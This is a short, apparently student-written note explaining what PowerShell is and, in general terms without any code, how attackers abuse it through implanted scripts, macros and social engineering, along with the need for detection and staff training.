Powershell

Powershell is a powerful scripting environment that is object-based. It is usually utilized by network administration-type personnel to manage their networks. It can be used for many back-end applications to automate processes. For example, it could be used to gather data from one database on a scheduled basis and incorporate that data into various other programs, such as reports on demand.

The fact that it is a scripting environment within the shell makes it a prime tool for hackers to target. By gaining access, they don't need to have a program downloaded which has a high likelihood of being detected by anti-malware. Instead, they can gain access directly into the shell and implant or write code directly into the automation processes. If the system is already automated to extract data and distribute it to other programs, administrators could easily miss one more destination being added to the hacker.

Use of this type of attack is on the rise, quickly gaining a large percentage of the hacker attacks conducted. Strategies must be in place to detect unauthorized access into the Powershell. Social engineering can also play a significant role in Powershell attacks. Opening an unknown file and accepting macros can be used to implant malicious code directly into the Powershell and lax physical security measures can allow bad actors physical access to network clients or servers. This necessitates a strong training plan for all employees, not just IT personnel.

Sources: Tech Thoughts The Register

Things I want to know more about

• Do active antivirus programs operate primarily in RAM?